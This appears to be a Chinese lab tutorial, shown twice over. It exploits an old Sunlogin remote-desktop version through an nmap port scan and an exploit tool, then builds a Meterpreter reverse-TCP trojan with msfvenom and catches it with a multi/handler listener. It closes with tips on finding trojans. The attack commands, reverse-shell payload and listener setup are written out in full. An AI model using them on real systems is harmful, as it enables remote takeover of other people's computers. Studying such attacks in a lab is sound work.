中华人民共和国网络安全法任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具:明知他人从事危害网络安全的活动的不得为其提供技术支持、广告推广、支付结算等帮助。声明此漏洞攻击实验全程在虚拟机内完成严禁用于个人及企业否则后果自负一、“向日葵”软件的低版本漏洞向日葵远程桌面控制软件的低版本会存在一个低版本漏洞当向日葵软件开启的时候它会向外随机开放一个大于40000的端口黑客可以利用这个低版本漏洞对目标电脑发起入侵。1、前提条件向日葵个人版本for Windows≤11.0.0.33向日葵简约版≤V1.0.1.433152021年12月版本杀毒软件和防火墙关闭软件在目标机上处于运行状态且知道目标机的ip地址。2、已知目标机ip地址为192.168.177.1293、在kali机里面输入命令nmap -p 40000-65535 192.168.177.129 来查看目标ip在40000-65535的范围内开放了哪些端口4、等待一段时间之后会扫出来很多端口号5、需要验证那个端口才是我们需要利用的端口在端口号的前面输入http://192.168.177.129:然后分别输入到浏览器的地址栏。5、当输入地址栏访问之后出现下图的页面就证明这个这个端口就是我们要找的端口。6、打开向日葵漏洞利用工具输入访问的网址再输入命令whoami 下面就会出现命令提示窗口然后可以通过命令提示窗口控制目标电脑。7、这个漏洞如何防御1升级软件到最新版本或者打版本补丁2使用漏洞检测工具开启防火墙和杀毒软件3关闭不常用的端口让黑客无路可走二、木马制作与攻击1、木马制作之前需要关闭防火墙和杀毒软件以免刚做出来的木马被查杀2、需要知道攻击者的ip地址3、在kali机上输入命令ip a 查看本机的ip地址4、在kali机上输入命令msfconsole 启动木马制作工具5、输入以下代码制作木马注意端口号不要用常用端口。msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.177.130 LPORT9999 -f exe shell.exe6、显示一下页面则制作成功7、木马制作好之后可以用各种方式发给目标电脑这里我们现假设对方已经下载木马程序在kali机输入命令use exploit/multi/handler------set payload windows/meterpreter/reverse_tcp-----set lhost 192.168.177.130-----set lport 9999-----run 启动监听。8、当目标机上面的木马程序运行之后kali机这边就会收到监听内容就可以控制目标电脑了。9、进行实验时千万注意输入的命令大小写和字母、符号、数字等等一个都不能输错万一出问题首先检查一下自己输入的是否为正确指令。三、如何排查电脑中的木马1、打开任务管理器查看进程看有没有可疑的名字很奇怪的程序在运行。2、打开命令提示窗口输入命令msinfo32 查看正在运行的任务看有没有陌生程序。3、输入命令netstat -ano 查看外部的ip地址看看有没有陌生ip和端口连接。4、打开启动项和计划任务看卡有没有自启动的可疑程序。5、输入命令services.msc 查看电脑的服务项看看有没有隐藏服务项在启动。6、借助第三方工具来测试有没有可疑信息。7、查看日志计算机的所有操作都会记录在日志里面。8、打开电脑的安全中心开启防火墙和病毒与防护功能打开杀毒软件。
第三方应用程序漏洞和木马制作小实验
中华人民共和国网络安全法任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具:明知他人从事危害网络安全的活动的不得为其提供技术支持、广告推广、支付结算等帮助。声明此漏洞攻击实验全程在虚拟机内完成严禁用于个人及企业否则后果自负一、“向日葵”软件的低版本漏洞向日葵远程桌面控制软件的低版本会存在一个低版本漏洞当向日葵软件开启的时候它会向外随机开放一个大于40000的端口黑客可以利用这个低版本漏洞对目标电脑发起入侵。1、前提条件向日葵个人版本for Windows≤11.0.0.33向日葵简约版≤V1.0.1.433152021年12月版本杀毒软件和防火墙关闭软件在目标机上处于运行状态且知道目标机的ip地址。2、已知目标机ip地址为192.168.177.1293、在kali机里面输入命令nmap -p 40000-65535 192.168.177.129 来查看目标ip在40000-65535的范围内开放了哪些端口4、等待一段时间之后会扫出来很多端口号5、需要验证那个端口才是我们需要利用的端口在端口号的前面输入http://192.168.177.129:然后分别输入到浏览器的地址栏。5、当输入地址栏访问之后出现下图的页面就证明这个这个端口就是我们要找的端口。6、打开向日葵漏洞利用工具输入访问的网址再输入命令whoami 下面就会出现命令提示窗口然后可以通过命令提示窗口控制目标电脑。7、这个漏洞如何防御1升级软件到最新版本或者打版本补丁2使用漏洞检测工具开启防火墙和杀毒软件3关闭不常用的端口让黑客无路可走二、木马制作与攻击1、木马制作之前需要关闭防火墙和杀毒软件以免刚做出来的木马被查杀2、需要知道攻击者的ip地址3、在kali机上输入命令ip a 查看本机的ip地址4、在kali机上输入命令msfconsole 启动木马制作工具5、输入以下代码制作木马注意端口号不要用常用端口。msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.177.130 LPORT9999 -f exe shell.exe6、显示一下页面则制作成功7、木马制作好之后可以用各种方式发给目标电脑这里我们现假设对方已经下载木马程序在kali机输入命令use exploit/multi/handler------set payload windows/meterpreter/reverse_tcp-----set lhost 192.168.177.130-----set lport 9999-----run 启动监听。8、当目标机上面的木马程序运行之后kali机这边就会收到监听内容就可以控制目标电脑了。9、进行实验时千万注意输入的命令大小写和字母、符号、数字等等一个都不能输错万一出问题首先检查一下自己输入的是否为正确指令。三、如何排查电脑中的木马1、打开任务管理器查看进程看有没有可疑的名字很奇怪的程序在运行。2、打开命令提示窗口输入命令msinfo32 查看正在运行的任务看有没有陌生程序。3、输入命令netstat -ano 查看外部的ip地址看看有没有陌生ip和端口连接。4、打开启动项和计划任务看卡有没有自启动的可疑程序。5、输入命令services.msc 查看电脑的服务项看看有没有隐藏服务项在启动。6、借助第三方工具来测试有没有可疑信息。7、查看日志计算机的所有操作都会记录在日志里面。8、打开电脑的安全中心开启防火墙和病毒与防护功能打开杀毒软件。
